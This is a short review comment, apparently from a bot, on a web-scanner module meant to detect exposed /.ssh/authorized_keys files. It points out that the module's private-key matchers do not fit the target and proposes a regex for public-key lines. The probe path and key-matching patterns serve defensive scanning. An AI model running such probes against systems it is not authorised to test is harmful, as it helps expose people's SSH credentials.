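Review bot: ssh-authorized-keys-disclosure.json requests `/.ssh/authorized_keys` but matches on `-----BEGIN RSA PRIVATE KEY-----` and `-----END RSA PRIVATE KEY-----`. An authorized_keys file holds public keys, one per line, so these matchers describe a private-key file and would miss a genuinely exposed authorized_keys. A regex matcher on the public-key line format, for example `"pattern": "(ssh-(rsa|ed25519)|ecdsa-sha2-nistp\\d+) AAAA[0-9A-Za-z+/]+"`, plus a `200` status matcher, would fit the file the module is named for. If private keys are the real target, the path list should name those files instead and the module should be renamed.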